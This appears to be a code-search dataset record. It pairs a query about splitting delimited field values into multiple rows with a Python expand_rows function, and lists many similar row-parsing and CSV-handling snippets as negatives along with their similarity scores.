[ "0.63519025", "0.63037026", "0.6226924", "0.621855", "0.621855", "0.605141", "0.60084903", "0.5960452", "0.5954665", "0.58187693", "0.58148223", "0.57171553", "0.56535655", "0.5637533", "0.56276727", "0.55754817", "0.55633485", "0.55611026", "0.54911935", "0.54818034", "0.5430281", "0.5391499", "0.53894114", "0.53786707", "0.5367213", "0.53666645", "0.53438616", "0.5327231", "0.5324738", "0.53171015", "0.53170305", "0.53140706", "0.5305187", "0.52955633", "0.5285228", "0.5266653", "0.52626544", "0.526045", "0.5254531", "0.5248107", "0.5243873", "0.5243873", "0.5229397", "0.5225766", "0.52160716", "0.52085876", "0.5204675", "0.5195257", "0.5192806", "0.51925135", "0.5184019", "0.5179823", "0.5179075", "0.5179071", "0.5172168", "0.515167", "0.51375014", "0.5135567", "0.5126202", "0.51170206", "0.5099442", "0.50990057", "0.5097474", "0.5095433", "0.5094593", "0.50940555", "0.50789267", "0.50685006", "0.5067387", "0.5063081", "0.5059276", "0.50583076", "0.50477326", "0.5047469", "0.50462514", "0.50406784", "0.5032209", "0.5020735", "0.5014433", "0.50099534", "0.50059706", "0.50058216", "0.5003467", "0.499986", "0.49985647", "0.49979404", "0.4997908", "0.49972206", "0.49890366", "0.4984606", "0.49837053", "0.4972733", "0.49716845", "0.49692497", "0.49631852", "0.49612883", "0.49584192", "0.4957266", "0.49524763", "0.4950249" ]
0.7508108
0
Take a row and a field which may have delimited values and convert it into a list of new rows with the same data except for the replaced delimited value.
def expand_rows(row, delimited_fields, expand_row):
    # _log.debug('expand_row is {}'.format(expand_row))

    # go through the delimited fields and clean up the rows
    copy_row = copy.deepcopy(row)
    for d in delimited_fields:
        if d in copy_row:
            copy_row[d] = expand_and_normalize_field(copy_row[d], False)

    if expand_row:
        new_values = []
        for d in delimited_fields:
            fields = []
            if d in copy_row:
                for value in expand_and_normalize_field(copy_row[d], True):
                    fields.append({d: value})
            new_values.append(fields)

        # return all combinations of the lists
        combinations = list(itertools.product(*new_values))

        new_rows = []
        for c in combinations:
            new_row = copy.deepcopy(copy_row)
            # c is a tuple because of the .product command
            for item in c:
                for k, v in item.items():
                    new_row[k] = v
            new_rows.append(new_row)

        return new_rows
    else:
        return [copy_row]
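A minimal usage sketch for expand_rows above (not part of the dataset record): it assumes the function is defined alongside import copy and import itertools, and that expand_and_normalize_field behaves like the Python 3 port sketched after the previous record's document. The row dict and field name are made up for illustration.

# assumes: import copy, import itertools at module level, plus
# expand_and_normalize_field and the expand_rows function shown above
row = {"address": "100 Main St", "tax_ids": "12-3; 45-6"}  # made-up example row

# expand_row=True: the delimited field fans out into one new row per value
print(expand_rows(row, ["tax_ids"], True))
# -> [{'address': '100 Main St', 'tax_ids': '12-3'},
#     {'address': '100 Main St', 'tax_ids': '45-6'}]

# expand_row=False: a single cleaned-up row, field re-joined with ";"
print(expand_rows(row, ["tax_ids"], False))
# -> [{'address': '100 Main St', 'tax_ids': '12-3;45-6'}]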
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def processRow(self, row):\n\t\tif self.delim is not None:\n\t\t\trowArr = row.split(self.delim)\n\t\t\tmsg = \"row does not have expected number of columns found \" + str(len(rowArr)) + \" expected \" + str(self.rowSize)\n\t\t\tassert len(rowArr) == self.rowSize, msg\n\t\telse:\n\t\t\trowArr = row\n\t\t\t\n\t\tnewRowArr = []\n\t\tfor i in range(len(rowArr)):\n\t\t\tcurVal = rowArr[i]\n\t\t\tif (i in self.catValues):\n\t\t\t\tvalues = self.catValues[i]\n\t\t\t\tfor val in values:\n\t\t\t\t\tif val == curVal:\n\t\t\t\t\t\tnewVal = self.trueVal\n\t\t\t\t\telse:\n\t\t\t\t\t\tnewVal = self.falseVal\n\t\t\t\t\tnewRowArr.append(newVal)\n\t\t\telse:\n\t\t\t\tnewRowArr.append(curVal)\n\t\tassert len(newRowArr) == self.newRowSize, \"invalid new row size \" + str(len(newRowArr)) + \" expected \" + str(self.newRowSize)\n\t\tencRow = self.delim.join(newRowArr) if self.delim is not None else newRowArr\n\t\treturn encRow", "def __parseCsvRow(row):\r\n \r\n resultRow = []\r\n for item in row:\r\n if type(item) is str:\r\n if \".\" in item:\r\n try:\r\n f = float(item)\r\n resultRow.append(f)\r\n except ValueError:\r\n resultRow.append(item)\r\n else:\r\n try:\r\n i = int(item)\r\n resultRow.append(i)\r\n except ValueError:\r\n resultRow.append(item)\r\n else:\r\n resultRow.append(item)\r\n return resultRow", "def clean_row(row,i):\n # convert string\n char_array = np.array(list(row))\n\n #insert entry dividers, then split by them\n div_ix = (\n np.array([6, 34, 48, 51, 54, 60, 64, 67, 72, 80, 86, 94, 100,\n 107, 112, 119, 125, 137, 141, 145, 156]),\n )\n char_array[div_ix] = ','\n new_csv_row = (''.join(char_array)).split(',')\n\n # remove excess whitespace surrounding data\n new_csv_row = np.array([entry.strip() for entry in new_csv_row])\n\n return new_csv_row", "def parse_and_flatten(df, field_name):\n\n # Parse and flatten the list\n lst = list(df[field_name])\n lst = [x.split('|') for x in lst]\n\n lst_flat = []\n for slist in lst:\n for x in slist:\n lst_flat.append(x)\n return lst_flat", "def expand_and_normalize_field(field, return_list=False):\n\n if isinstance(field, basestring):\n field = field.rstrip(';:,')\n data = [_normalize_expanded_field(r) for r in re.split(\",|;|:\", field)]\n if return_list:\n return data\n else:\n return \";\".join(data)\n else:\n if return_list:\n return [field]\n else:\n return field", "def map_field_value(\n row: DLCSRecord, field_name: str, config: typing.Dict\n) -> typing.Any:\n mapping: mapper.MappigDictValue = mapper.FIELD_MAPPING[field_name]\n\n if mapping is None:\n return None\n\n if callable(mapping):\n return mapping(row)\n\n if isinstance(mapping, str):\n mapping = [mapping]\n\n if not isinstance(mapping, typing.Collection):\n raise TypeError(\n f\"FIELD_MAPPING[field_name] must be iterable, unless it is None, Callable, or a string.\"\n )\n\n output: typing.List[str] = []\n for csv_field in mapping:\n input_value = row.get(csv_field)\n if input_value:\n if isinstance(input_value, str):\n output.extend(input_value.split(\"|~|\"))\n else:\n output.append(input_value)\n\n bare_field_name = get_bare_field_name(field_name)\n if bare_field_name in config.get(\"controlled_fields\", {}):\n terms = config[\"controlled_fields\"][bare_field_name][\"terms\"]\n output = [terms.get(value, value) for value in output]\n\n return [value for value in output if value] # remove untruthy values like ''", "def ConvertRow(self, row):\n i = 0\n data = []\n for entry in row['f']:\n data.append(self.Convert(entry['v'], self.schema[i]))\n i += 1\n return tuple(data)", "def 
parse_row(input_row, parsers):\n\n return [parser(value) if parser is not None else value\n for value, parser in zip(input_row, parsers)]", "def _parse_row(row: str):\n final_row = []\n for char in row:\n\n # any number N expands into N spaces\n if char in \"12345678\":\n for i in range(int(char)):\n final_row.append(EMPTY_SPACE)\n else:\n final_row.append(char)\n\n return final_row", "def _convert_row(self, row) :\n\n self.row_id += 1\n data = [self.row_id]\n\n if type(row) == type({}) :\n data.extend(row.get(col, None) for col in self.cols[1:])\n elif type(row) in [type([]), type(())] :\n data.extend(row)\n elif type(row) == RowReference :\n data.extend(row.values())\n else :\n raise Exception(\n 'Don''t know how to add row from: %s ' % str(row)\n )\n\n if len(data) != len(self.cols) :\n raise Exception(\n 'Wrong number of values for new row with cols %s: %s' % \n (str(self.cols), str(data))\n \n )\n\n return data", "def csv_line(value_parser):\n def convert(string):\n return list(map(value_parser, string.split(',')))\n return convert", "def lst_to_field(table, field, lst):\n if len(lst) == 0:\n message(\"No values to add to '{}'.\".format(field))\n elif field_exists(table, field): \n with arcpy.da.UpdateCursor(table, [field]) as cursor:\n # For row in cursor:\n for i, row in enumerate(cursor):\n row[0] = lst[i]\n cursor.updateRow(row)\n else:\n message(\"{} field not found in {}\".format(field, table))", "def rebuild_row(lst, is_collocation):\n split_list = lst[0].split(\"\\t\")\n if is_collocation:\n return [split_list[0] + \" \" + split_list[1], \"1\"]\n return [split_list[0] + \" \" + split_list[1], \"0\"]", "def _read_delimited_field(d):\n val = []\n val.append(next(d))\n while val[-1] != FIELD_DELIMITER:\n try:\n val.append(next(d))\n except StopIteration: break\n\n modlogger.debug( \"read:%s\"%val[:-1])\n return field_ctor(val[:-1])", "def parse_row(input_row, parsers):\n return [try_or_none(parser)(value) if parser is not None else value\n for value, parser in zip(input_row, parsers)]", "def expand_row(\n row: Sequence[Union[str, Sequence[Union[str, Sequence[str]]]]]\n) -> List[List[str]]:\n elems_as_lists = []\n for elem in row:\n if isinstance(elem, list):\n elems_as_lists.append(elem)\n else:\n elems_as_lists.append([elem])\n aligned = [list(i) for i in zip_longest(*elems_as_lists, fillvalue=\"\")]\n return aligned", "def fake_clean_row(row):\n\treturn row", "def rows_to_list(records):\n raw_list = []\n for record in records:\n items = record.items()\n raw_list.append({i[0]: i[1].rstrip() if type(\n i[1]) == str else i[1] for i in items})\n\n # Process data for compounding flag to be boolean since SQLite does not have a boolean type\n processed_list = []\n for row in raw_list:\n if 'compounding_flag' in row:\n if row['compounding_flag'] == '1':\n row['compounding_flag'] = True\n else:\n row['compounding_flag'] = False\n processed_list.append(row)\n\n # If processed list is empty, no processing was done, just assign raw list\n if not processed_list:\n processed_list = raw_list\n\n return processed_list", "def format_row(row):\n assert isinstance(row,list)\n \n data_row=[0]*len(header) #Formatted data row to be output and appeneded to 'data'\n \n for i in [0,1,11,13,14,15,16,17,19,20,21,28,31,45,46,47,48]: data_row[i]=row[i] #emptry string will NOT return None\n for i in [2,3,12,18]: data_row[i]=type_cast(lambda x: int(float(x)),row[i])\n for i in [6,7,8,9,10,23,24,25,26,27,29,30]: data_row[i]=type_cast(float,row[i])\n for i in [4,5,22]: 
data_row[i]=type_cast(datetime.strptime,row[i],'%Y-%m-%d %H:%M:%S')\n for i in range(32,45):\n if row[i]=='False': data_row[i]=False #bool('False') returns True!\n elif row[i]=='True': data_row[i]=True\n else: data_row[i]=None\n return data_row", "def transform(input):\n transformed_file = []\n\n for row in input:\n names = row['name'].split()\n row['fname'] = names[0]\n row['lname'] = names[1]\n del row['name']\n transformed_file.append(row)\n return transformed_file", "def parse_row(input_row, parsers):\n\n return [try_or_none(parser)(value) if parser is not None else value\n for value, parser in zip(input_row, parsers)]", "def parse_rows(self, rows):\r\n rows = [\r\n (row_id, parse_date(created), student_module_id)\r\n for row_id, created, student_module_id in rows\r\n ]\r\n return rows", "def _convert_field_type(row):\n return row", "def process_row(self, row: Union[List[dict], dict]) -> List[dict]:\n rows = listify(row)\n rows = self.do_pre_row(rows=rows)\n row_return = [{\"internal_axon_id\": row[\"internal_axon_id\"]} for row in rows]\n rows = self.do_row(rows=rows)\n self.write_rows(rows=rows)\n del rows, row\n return row_return", "def process_row(self, table, row):\n for index, column in enumerate(table.columns):\n hash_key = hash(frozenset(column.items()))\n column_type = self.column_types[hash_key] if hash_key in self.column_types else self.column_type(column)\n if row[index] == None and ('timestamp' not in column_type or not column['default']):\n row[index] = '\\N'\n elif row[index] == None and column['default']:\n if self.tz:\n row[index] = '1970-01-01T00:00:00.000000' + self.tz_offset\n else:\n row[index] = '1970-01-01 00:00:00'\n elif 'bit' in column_type:\n row[index] = bin(ord(row[index]))[2:]\n elif isinstance(row[index], (str, unicode, basestring)):\n if column_type == 'bytea':\n row[index] = Binary(row[index]).getquoted()[1:-8] if row[index] else row[index]\n elif 'text[' in column_type:\n row[index] = '{%s}' % ','.join('\"%s\"' % v.replace('\"', r'\\\"') for v in row[index].split(','))\n else:\n row[index] = row[index].replace('\\\\', r'\\\\').replace('\\n', r'\\n').replace(\n '\\t', r'\\t').replace('\\r', r'\\r').replace('\\0', '')\n elif column_type == 'boolean':\n # We got here because you used a tinyint(1), if you didn't want a bool, don't use that type\n row[index] = 't' if row[index] not in (None, 0) else 'f' if row[index] == 0 else row[index]\n elif isinstance(row[index], (date, datetime)):\n if isinstance(row[index], datetime) and self.tz:\n try:\n if row[index].tzinfo:\n row[index] = row[index].astimezone(self.tz).isoformat()\n else:\n row[index] = datetime(*row[index].timetuple()[:6], tzinfo=self.tz).isoformat()\n except Exception as e:\n print e.message\n else:\n row[index] = row[index].isoformat()\n elif isinstance(row[index], timedelta):\n row[index] = datetime.utcfromtimestamp(_get_total_seconds(row[index])).time().isoformat()\n else:\n row[index] = AsIs(row[index]).getquoted()", "def __parse_string_for_delimiter__(self, data):\n parsed = []\n for row in data:\n row = self.__remove_break_line__(row)\n row = self.__split_for_delimiter__(row)\n parsed.append(row)\n return parsed", "def process_data(data, enc=None, delim=None):\n if enc is None:\n enc = detect_encoding(data)\n if delim is None:\n delim = csv_sniff(data[0], enc)\n csv_data = []\n if sys.version_info.major < 3:\n csv_obj = csv.reader(data, delimiter=delim.encode(enc))\n for row in csv_obj:\n row = [str(x, enc) for x in row]\n csv_data.append(row)\n else:\n data = [i.decode(enc) for i in 
data]\n csv_obj = csv.reader(data, delimiter=delim)\n for row in csv_obj:\n csv_data.append(row)\n return pad_data(csv_data)", "def tidy_split(df, column, sep='|', keep=False):\r\n indexes = list()\r\n new_values = list()\r\n df = df.dropna(subset=[column])\r\n for i, presplit in enumerate(df[column].astype(str)):\r\n values = presplit.split(sep)\r\n if keep and len(values) > 1:\r\n indexes.append(i)\r\n new_values.append(presplit)\r\n for value in values:\r\n indexes.append(i)\r\n new_values.append(value)\r\n new_df = df.iloc[indexes, :].copy()\r\n new_df[column] = new_values\r\n return new_df", "def _parsecsv(x):\n for line in x:\n # decode as utf-8, whitespace-strip and split on delimiter\n yield line.decode('utf-8').strip().split(config.DELIMITER)", "def tidy_split(df, column='Members', sep=', '):\n\n indexes = []\n new_values = []\n for i, presplit in enumerate(df[column].astype(str)):\n for value in presplit.split(sep):\n indexes.append(i)\n new_values.append(value)\n new_df = df.iloc[indexes, :].copy() # the .copy() Prevents a warning\n new_df[column] = new_values\n df = new_df.reset_index(drop=True)\n return df", "def mapper_data_cleaning(self, l, line):\n lineitems = line.split(\",\")\n yield (lineitems[0], lineitems[2])", "def convert(row):\n\n for k,v in row.iteritems():\n if isinstance(v, str):\n if v.isdigit():\n row[k] = int(v)\n elif re.match(r'^\\d+[,\\.]\\d+$', v):\n row[k] = float(v)\n return row", "def clean_rows(reader):\n return [[a.strip() for a in row] for row in reader if row]", "def from_csv_line(line):\r\n return line.strip().split(',')", "def parse_row(row):\n var = row[:5].strip()\n row = row.rstrip('\\n')\n vals = []\n for i in range(5, len(row)-1,3):\n val = row[i:i+3].strip()\n if ('/' in val):\n vals[-1] = None\n vals.append(row[i-3:i+3].strip())\n elif val != '':\n vals.append(row[i:i+3].strip())\n else:\n vals.append(None)\n return var, vals", "def row_from_chunks(chunks):\n # Some values migh have commas in then. 
In that case we re-concatenate\n # chunks between quotes\n merging = False\n merged_value = ''\n quote = None # Record quote as '\\'' and look for this as the end quote also.\n row = []\n for chunk in chunks:\n # Important that we are not already merging, i do not restart - this is\n # an edge case actually gives an error in our data..\n if chunk.startswith('\\'') and not merging:\n merging = True\n quote = chunk[0]\n merged_value += chunk\n elif merging:\n merged_value += chunk\n else:\n row.append(chunk)\n\n # If the chunk ends with a quote, append the merged value to the row, and stop mergin\n # At this point, if merging is True, quote should not be None, if so, we would just like\n # things to blow up here\n if merging and chunk.endswith(quote):\n merging = False\n quote = None\n row.append(merged_value)\n return row", "def string_split_2d(data, field_delimiter=',', line_delimiter='\\n'):\n return [line.split(field_delimiter) for line in data.split(line_delimiter)]", "def wrap_row(row, col_widths, hyphen_break=False, field_sep=' | ',\n break_chrs=''):\n assert len(row) == len(col_widths)\n # Broken fields (padded)\n broken_fields = [\n wrap(field, width, hyphen_break=hyphen_break, break_chrs=break_chrs)\n for field, width in zip(row, col_widths)\n ]\n # Transpose & join each broken line\n return '\\n'.join(\n field_sep.join(line) for line in zip_longest_strings(broken_fields)\n )", "def prescribing_transform(row):\n # To match the prescribing table format in BigQuery, we have\n # to re-encode the date field as a bigquery TIMESTAMP and drop\n # a couple of columns\n row[10] = \"%s 00:00:00\" % row[10]\n del(row[3])\n del(row[-1])\n return row", "def filter(self, row):\r\n return list(itertools.compress(row, self.selectors))", "def FE_split_one_field_into_many(df_in, field, splitter, filler, new_names_list='', add_count_field=False):\r\n df_field = df_in[field].values\r\n df = copy.deepcopy(df_in)\r\n ### First copy whatever is in that field so we can save it for later ###\r\n df[field].fillna(filler, inplace=True)\r\n if add_count_field:\r\n ### there will be one extra field created when we count the number of contents in each field ###\r\n max_things = df[field].map(lambda x: len(x.split(splitter))).max() + 1\r\n else:\r\n max_things = df[field].map(lambda x: len(x.split(splitter))).max()\r\n if len(new_names_list) == 0:\r\n print(' Max. columns created by splitting %s field is %d.' %(\r\n field,max_things))\r\n else:\r\n if not max_things == len(new_names_list):\r\n print(\"\"\" Max. columns created by splitting %s field is %d but you have given %d \r\n variable names only. Selecting first %d\"\"\" %(\r\n field,max_things,len(new_names_list),len(new_names_list)))\r\n ### This creates a new field that counts the number of things that are in that field.\r\n if add_count_field:\r\n #### this counts the number of contents after splitting each row which varies. Hence it helps.\r\n num_products_viewed = 'Content_Count_in_'+field\r\n df[num_products_viewed] = df[field].map(lambda x: len(x.split(splitter))).values\r\n ### Clean up the field such that it has the right number of split chars otherwise add to it\r\n ### This fills up the field with empty strings between each splitter. You can't do much about it.\r\n #### Leave this as it is. It is not something you can do right now. 
It works.\r\n fill_string = splitter + filler\r\n df[field] = df[field].map(lambda x: x+fill_string*(max_things-len(x.split(splitter))) if len(\r\n x.split(splitter)) < max_things else x)\r\n ###### Now you create new fields by split the one large field ########\r\n if isinstance(new_names_list, str):\r\n if new_names_list == '':\r\n new_names_list = [field+'_'+str(i) for i in range(1,max_things+1)]\r\n else:\r\n new_names_list = [new_names_list]\r\n ### First fill empty spaces or NaNs with filler ###\r\n df.loc[df[field] == splitter, field] = filler\r\n for i in range(len(new_names_list)):\r\n try:\r\n df[new_names_list[i]] = df[field].map(lambda x: x.split(splitter)[i]\r\n if splitter in x else filler)\r\n except:\r\n df[new_names_list[i]] = filler\r\n continue\r\n ### there is really nothing you can do to fill up since they are filled with empty strings.\r\n #### Leave this as it is. It is not something you can do right now. It works.\r\n df[field] = df_field\r\n return df, new_names_list", "def _add_from_list(self, row) :\n\n data = [0]\n data.extend(row[:len(self.cols)-1])\n cols = self.cols[:len(data)]\n self._insert_internal(cols, data)", "def _format_column(self, row_data):\n return [[row[i] for row in row_data] for i in range(self.row_length)]", "def parse_csv_row(self, row):\n\n for key in self.field_map:\n if self.field_map[key] is not None:\n if key == 'marking':\n self.obstacle_data[key] = self.get_marking_value(row[self.field_map[key]].strip())\n elif key == 'lighting':\n self.obstacle_data[key] = self.get_lighting_value(row[self.field_map[key]].strip())\n elif key == 'obst_type':\n self.obstacle_data['obst_type_id'] = self.get_obstacle_type_id(row[self.field_map[key]].strip())\n else:\n self.obstacle_data[key] = row[self.field_map[key]].strip()", "def _extract(self, row):\n if not self._head:\n self._head = self._create_head(row)\n if self._args.head:\n return\n\n if 'extract' not in self._state:\n self._state['extract'] = self._replace_fields(self._args.extract)\n\n r = list(map(self._convert, row))\n return eval(self._state['extract'])", "def parse_row(row):\n station_id = parse_substation_code(row)\n date_and_time = parse_date_and_time(row)\n depth = parse_depth(row)\n quality_code = parse_quality_code(row)\n value = parse_value(row)\n return [station_id, date_and_time, depth, quality_code, value]", "def extractFields(line, delim, keepIndices):\n\titems = line.split(delim)\n\tnewLine = []\n\tfor i in keepIndices:\n\t\tnewLine.append(line[i])\n\treturn delim.join(newLine)", "def _parse_row(self, record):\n original_record = record\n reverse_record = record[::-1]\n # Records contain null bitmaps for columns. The number of bitmaps is the number of columns / 8 rounded up\n null_table_len = (self.table_header.column_count + 7) // 8\n if null_table_len and null_table_len < len(original_record):\n null_table = record[-null_table_len:]\n # Turn bitmap to a list of True False values\n null_table = [((null_table[i // 8]) & (1 << (i % 8))) != 0 for i in range(len(null_table) * 8)]\n else:\n logging.error(f\"Failed to parse null table column count {self.table_header.column_count}\")\n return\n if self.version > 3:\n field_count = struct.unpack_from(\"h\", record)[0]\n record = record[2:]\n else:\n field_count = struct.unpack_from(\"b\", record)[0]\n record = record[1:]\n\n relative_records_column_map = {}\n # Iterate columns\n for i, column in self.columns.items():\n # Fixed length columns are handled before variable length. 
If this is a variable length column add it to\n # mapping and continue\n if not column.column_flags.fixed_length:\n relative_records_column_map[i] = column\n continue\n\n self._parse_fixed_length_data(record, column, null_table)\n if relative_records_column_map:\n relative_records_column_map = dict(sorted(relative_records_column_map.items()))\n metadata = self._parse_dynamic_length_records_metadata(reverse_record, original_record,\n null_table_len)\n if not metadata:\n return\n self._parse_dynamic_length_data(original_record, metadata, relative_records_column_map)", "def __parse_line(self, line: str) -> list:\n row = line.split(' ')\n for i in range(len(row)-1):\n row[i] = int(row[i])\n row = row[0:-1]\n return row", "def line_to_list(self, _line):\n\n\t\tresult = list()\t\t\n\t\t_line_splited = _line.split('\\t')\n\t\t\n\t\tfor value in _line_splited:\n\t\t\tvalue_stripped = value.strip().rstrip()\t\t\t\n\t\t\tresult.append(value_stripped)\t\t\t\t\n\t\t\n\t\treturn result", "def csv_to_field_Urls(entity, value):\n if value is None or value == '':\n return\n splitter = re.compile(url_splitter)\n entity.string = splitter.split(value)", "def _transform_row_model(\n rowkey: str, row: dict, sep: str\n) -> models.RowModelOdd:\n keys = [\"sid\", \"lid\", \"mid\", \"mkt\", \"seq\", \"per\", \"vendor\", \"ts\"]\n info_list: list = [\"s\", \"per\", \"et\"]\n\n row_dict = dict(zip(keys, rowkey.split(sep)))\n row_dict[\"info\"] = {}\n row_dict[\"odds\"] = {}\n row_model = models.RowModelOdd(**row_dict)\n \n info_dict: dict = {}\n for col in info_list:\n col_name = \":\".join([\"info\", col])\n info_dict[col] = row[col_name.encode(\"utf-8\")]\n row_model.info = models.OddInfoModel(**info_dict)\n\n target_cols = _get_target_column_list(row_model.mkt)\n odds_dict: dict = {}\n for col in target_cols:\n col_name = \":\".join([\"odds\", col])\n odds_dict[col] = row[col_name.encode(\"utf-8\")]\n\n odd_model = None\n mkt: str = row_model.mkt\n if mkt.startswith(\"1x2\"):\n odd_model = models.ColumnModel1x2(**odds_dict)\n elif mkt.startswith(\"ah\"):\n odd_model = models.ColumnModelAH(**odds_dict)\n else:\n odd_model = models.ColumnModelOU(**odds_dict)\n\n row_model.odds = odd_model\n\n return row_model", "def fix_dates(self, row):\r\n for field in self.date_fields:\r\n if field in row:\r\n if not type(row[field]) is datetime:\r\n try:\r\n row[field] = datetime.fromtimestamp(float(row[field]))\r\n except Exception as e:\r\n row[field] = None", "def _split(self, sql):\n\n placeholder = \"\\ufffc\" # unicode object replacement character\n\n if self._delimiter == ';':\n return sqlparse.split(sql)\n\n # We must find a string that original sql does not contain.\n # Most likely, our placeholder is enough, but if not, keep looking\n while placeholder in sql:\n placeholder += placeholder[0]\n sql = sql.replace(';', placeholder)\n sql = sql.replace(self._delimiter, ';')\n\n split = sqlparse.split(sql)\n\n return [\n stmt.replace(';', self._delimiter).replace(placeholder, ';')\n for stmt in split\n ]", "def _reduce_datetimes(row):\n\n row = list(row)\n\n for i, val in enumerate(row):\n if hasattr(val, \"strftime\"):\n row[i] = val.strftime(\"%Y-%m-%d %H:%M:%S\")\n elif hasattr(val, 'isoformat'):\n row[i] = val.isoformat()\n return tuple(row)", "def format_row(self, row):\n raise NotImplementedError()", "def rows(file, prep=None,\n whitespace='[\\n\\r\\t]',\n comments='#.*',\n sep=\",\"\n ):\n doomed = re.compile('(' + whitespace + '|' + comments + ')')\n with open(file) as fs:\n for line in fs:\n line = re.sub(doomed, 
\"\", line)\n if line:\n row = map(lambda z: z.strip(), line.split(sep))\n if len(row) > 0:\n yield prep(row) if prep else row", "def _filter(self, row):\n if not self._head:\n self._head = self._create_head(row)\n if self._args.head:\n return row\n\n if 'cond' not in self._state:\n self._state['cond'] = self._replace_fields(self._args.cond)\n\n r = list(map(self._convert, row))\n if eval(self._state['cond']):\n return row", "def left_to_right(data, key, col_tuple, col_tuples, re_tuples, cnt):\n if cnt == 0:\n data[\"tmp\"] = data[col_tuple[0]].astype(str).str.extract(re_tuples[cnt][0],\n expand=True)\n data[col_tuple[1]] = data[col_tuple[1]].fillna(data[\"tmp\"].str.strip())\n data[col_tuple[0]] = data[col_tuple[0]].astype(str).str.extract(re_tuples[cnt][1].format(key),\n expand=True)\n data = data.drop(columns=\"tmp\")\n return data\n else:\n data[\"tmp\"] = data[col_tuple[0]].astype(str).str.extract(re_tuples[cnt][0],\n expand=True)\n data[col_tuple[1]] = data[col_tuple[1]].fillna(data[\"tmp\"].str.strip())\n data[col_tuple[0]] = data[col_tuple[0]].astype(str).str.extract(re_tuples[cnt][1],\n expand=True)\n data = data.drop(columns=\"tmp\")\n return data", "def split_column(df,col_name,reg_ex=',',keep=False):\n # https://stackoverflow.com/a/51680292/5847441\n df = df.select(col_name,posexplode(split(col_name,reg_ex)).alias('pos','val'))\\\n .select(col_name,concat(lit(col_name),col('pos').cast('string')).alias('name'),'val')\\\n .groupBy(col_name).pivot('name').agg(first('val'))\n if keep:\n return df\n else:\n return df.drop(col_name)", "def split_data(lines_in):\n rows = []\n for line in lines_in:\n field = []\n\n for i in line.split(\"\\t\"):\n field.append(i)\n rows.append(field)\n\n rows = rows[1:] # strip header\n\n return rows", "def translate_fields_reader(data_lines, field_translations_path, delimiter):\n reader = csv.DictReader(data_lines, delimiter=delimiter)\n fieldtranslation_lines = utils.retrieve_file_lines(field_translations_path)\n\n if len(fieldtranslation_lines) < 2:\n return reader\n\n original_keys = data_lines[0]\n fieldname_keys = fieldtranslation_lines[0].split(delimiter)\n fieldname_values = fieldtranslation_lines[1].split(delimiter)\n\n # Filters the fields within a Dictionary and maps them to the specified\n # fieldvalue names so that only fields specified in the field translations\n # document are returned\n def field_filter(it, keys, fieldvalues):\n for d in it:\n yield dict((fieldvalues[keys.index(k)], d[k]) for k in keys if k in original_keys and k != \"\")\n\n return field_filter(reader, fieldname_keys, fieldname_values)", "def test_init_with_field_dict_and_custom_field_separator(self):\n fields = {\n 'Column 1': 'a=${aaa}',\n 'Column 2': 'b=${bbb}',\n 'Column 3': 'c=${ccc}',\n }\n csv_formatter = CSVFormatter(fields=fields, sep=\" || \")\n csv = csv_formatter.format_records(self.records)\n\n csv_expected = textwrap.dedent(\"\"\"\\\n #Column 1 || Column 2 || Column 3\n a=foobar_01 || b=8 || c=4898FE19\n a=foobar_02 || b=160 || c=5825D187\n a=foobar_03 || b=99 || c=3648A436\n \"\"\")\n\n assert csv == csv_expected", "def remFields(line, delim, remIndices):\n\titems = line.split(delim)\n\tnewLine = []\n\tfor i in range(len(items)):\n\t\tif not arrayContains(remIndices, i):\n\t\t\tnewLine.append(line[i])\n\treturn delim.join(newLine)", "def __convert_two_cols(raw_array: list, num_rows: int):\n\n # no need to check extra row, we can go right into conversions\n for i in range(num_rows):\n\n # float conversion\n float_value = float(raw_array[i][1])\n 
raw_array[i][1] = float_value\n\n # no need to delete an extra entry,\n # we can just convert the existing string and assign it\n timestamp = pd.Timestamp(raw_array[i][0])\n raw_array[i][0] = timestamp\n\n return", "def f(data: Dict):\n if field in data and isinstance(data[field], List):\n data[field] = \",\".join(data[field])", "def test_leading_trailing_whitespaces_in_fields_are_stripped(self):\n self.df[\"new_concat_field_ae\"] = concat_fieldvalues(self.df, ['a', 'e'])\n\n expected_result_ae = pd.DataFrame({'new_concat_field_ae': ['x y12', 'y', 'x']})\n assert_series_equal(self.df[\"new_concat_field_ae\"], expected_result_ae['new_concat_field_ae'])", "def list_process(field, item_list:List[str]):\n # if isinstance(item_list, list):\n if len(item_list) == 0:\n return {\n\n }\n saved_list = []\n\n for i in item_list:\n saved_list.append(f\"{i}\")\n return {\n field: \",\".join(saved_list)\n }", "def right_to_left(data, key, col_tuple, col_tuples, re_tuples,\n re_triple, cnt):\n first_col = col_tuples[0]\n second_col = col_tuples[1]\n if col_tuple == first_col or col_tuple == second_col:\n if col_tuple == first_col:\n data[\"tmp_0\"] = data[col_tuple[1]].astype(str).str.extract(re_triple[cnt][0].format(key),\n expand=True)\n else:\n data[\"tmp_0\"] = data[col_tuple[1]].astype(str).str.extract(re_triple[cnt][0],\n expand=True)\n data[\"tmp_1\"] = data[\"tmp_0\"].str.extract(re_triple[cnt][1],\n expand=True)\n if col_tuple == first_col:\n regex = re_triple[cnt][2].format(key)\n data[\"tmp_0\"] = data[\"tmp_0\"].str.extract(regex, expand=True)\n else:\n regex = re_triple[cnt][2]\n data[\"tmp_0\"] = data[\"tmp_0\"].str.extract(regex, expand=True)\n tmp_0_clean = data[\"tmp_0\"].str.strip()\n data[col_tuple[0]] = data[col_tuple[0]].fillna(tmp_0_clean)\n if col_tuple == first_col:\n data[col_tuple[1]] = data[col_tuple[1]].replace(re_triple[cnt][0].format(key),\n np.NaN, regex=True)\n else:\n data[col_tuple[1]] = data[col_tuple[1]].replace(re_triple[cnt][0][:-15]+\")\",\n np.NaN, regex=True)\n data[col_tuple[1]] = data[col_tuple[1]].replace(re_triple[cnt][0],\n np.NaN, regex=True)\n tmp_1_clean = data[\"tmp_1\"].str.strip()\n data[col_tuple[1]] = data[col_tuple[1]].fillna(tmp_1_clean)\n data = data.drop(columns=\"tmp_0\")\n data = data.drop(columns=\"tmp_1\")\n return data", "def process_group(row):\n splitted_name = row.name.split(extreme_separator)\n return sorted(splitted_name) + [row[2]]", "def convert_line(line):\n line = line.strip().replace(\"]\", \"\").replace(\"[\", \"\")\n return line.split(\",\")", "def fix_multiallelics(cell):\n\tsplitters = [',', ';']\n\tif any(splitter in str(cell) for splitter in splitters):\n\t\tcell = re.split(';|,', cell)[0]\n\treturn cell", "def split_records(\n items: Iterable,\n content_field: str | int,\n itemwise: bool = False,\n) -> Iterable:\n if itemwise is True:\n return ((item.pop(content_field), item) for item in items)\n else:\n return 